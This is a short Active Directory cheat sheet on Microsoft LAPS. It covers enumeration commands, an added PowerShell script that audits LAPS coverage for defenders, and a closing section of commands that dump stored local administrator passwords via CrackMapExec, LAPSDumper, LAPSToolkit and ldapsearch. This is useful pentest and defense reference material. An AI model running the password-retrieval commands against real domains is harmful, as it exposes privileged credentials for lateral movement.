Local Administrator Password Solution (LAPS)

Microsoft LAPS automates management of the local administrator account on every computer in Active Directory. The LAPS client-side extension on each computer generates a random, secure password and stores it in the ms-Mcs-AdmPwd attribute of that computer's AD object. This is considered secure: each machine gets its own password, which mitigates an attacker passing the local administrator hash throughout the domain.

Enumerating LAPS

# Check that the schema contains the LAPS attribute, using the cmdlet Get-ADObject
Get-ADObject 'CN=ms-mcs-admpwd,CN=Schema,CN=Configuration,DC=dc,DC=parzival,DC=com'

# Check if the DLL is installed locally
Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll'
dir "C:\Program Files\LAPS\CSE"

# Checking registry
reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
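
The same three checks can be turned into a coverage report that shows which machines LAPS is not actually managing. This is an added example, not code from the original page or from any of the tools it links. The function names Get-LapsCoverage and Test-LapsClient and the StaleDays default are hypothetical, and it assumes the RSAT ActiveDirectory module, legacy Microsoft LAPS, and its ms-Mcs-AdmPwdExpirationTime attribute, which the page does not mention.

```powershell
# Added example: LAPS coverage report for defenders (hypothetical function names).
# Assumes the RSAT ActiveDirectory module and legacy Microsoft LAPS (ms-Mcs-* attributes).
function Get-LapsCoverage {
    [CmdletBinding()]
    param(
        [string]$SearchBase = (Get-ADDomain).DistinguishedName,
        [int]$StaleDays = 7   # assumed grace period past expiry before a host is flagged
    )

    # 1. Confirm the schema was extended; resolve the schema DN instead of hard-coding it.
    $schemaNc = (Get-ADRootDSE).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNc -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)'
    if (-not $attr) { throw 'ms-Mcs-AdmPwd is not in the schema: LAPS is not deployed.' }

    # 2. Read only the expiration timestamp, never the password attribute itself.
    #    If the caller cannot read the timestamp, the host is reported as Unmanaged.
    $cutoff = (Get-Date).ToUniversalTime().AddDays(-$StaleDays)
    Get-ADComputer -SearchBase $SearchBase -Filter 'Enabled -eq $true' `
                   -Properties 'ms-Mcs-AdmPwdExpirationTime' |
        ForEach-Object {
            $raw = $_.'ms-Mcs-AdmPwdExpirationTime'   # FILETIME stored as Int64
            $expires = if ($raw) { [datetime]::FromFileTimeUtc([int64]$raw) } else { $null }
            $state = if (-not $expires) { 'Unmanaged' } elseif ($expires -lt $cutoff) { 'Stale' } else { 'Managed' }
            [pscustomobject]@{
                Computer   = $_.Name
                State      = $state      # Unmanaged: never set; Stale: client stopped rotating
                ExpiresUtc = $expires
            }
        }
}

# Local counterpart of the DLL and registry checks above, returned as an object.
function Test-LapsClient {
    $cse    = Join-Path $env:ProgramFiles 'LAPS\CSE\AdmPwd.dll'
    $policy = Get-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft Services\AdmPwd' `
                               -Name AdmPwdEnabled -ErrorAction SilentlyContinue
    [pscustomobject]@{
        CseInstalled  = Test-Path $cse
        PolicyEnabled = ($policy.AdmPwdEnabled -eq 1)
    }
}

# Usage: list every enabled computer that LAPS is not keeping current.
# Get-LapsCoverage | Where-Object State -ne 'Managed' | Sort-Object State, Computer
```

Hosts reported as Unmanaged or Stale still carry whatever local administrator password they were built with, so they are the ones where a shared hash remains reusable.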

Retrieving LAPS Passwords

# Retrieve password using CrackMapExec
cme ldap $dc -u $username -p $password -M laps

# https://github.com/n00py/LAPSDumper
python laps.py -u $username -p $password -d $domain

# https://github.com/leoloobeek/LAPSToolkit
Get-LAPSComputers

# Manually with LDAP
ldapsearch -x -h $host -D $user -w $password -b "dc=$domain,dc=com" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
